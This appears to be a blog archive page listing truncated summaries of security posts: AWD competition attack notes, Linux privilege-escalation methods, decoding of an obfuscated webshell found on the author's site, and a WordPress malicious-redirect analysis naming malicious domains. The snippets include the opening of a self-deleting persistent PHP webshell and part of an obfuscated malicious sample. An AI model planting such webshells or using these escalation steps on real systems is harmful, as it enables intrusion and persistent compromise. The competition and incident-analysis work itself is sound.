09 2020 档案
摘要:#Attack ##漏洞利用 文件上传 任意文件读取 ##webshell上传 不死马确实好用 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '3.php'; $code = '<?php if
阅读全文
摘要:#Linux提权 为线下AWD准备 主要包括的方式:利用脏牛提权、利用Searchsploit内核漏洞EXP提权、利用SUID+低版本Nmap交互提权。其他利用方式后续补充。 ##信息收集 uname -a //获取内核版本信息 cat /etc/issue //查看发行版 cat /etc/*-r
阅读全文
摘要:昨天发现了网站被传了三个webshell,尝试解一下其中一个: #orginal: <?php // Silence is golden. function _qErd($_vD2WjKueM) { $_vD2WjKueM=substr($_vD2WjKueM,(int)(hex2bin('3131
阅读全文
摘要:#背景 一个wordpress站点 访问主站后跳转至其他恶意域名 抓包看了一下 利用的是302跳转 而不是直接转向其他站 跳转的域名如下 bestprize-places-here1.life bestanimegame.com auteartumn10.live location.lowerbef
阅读全文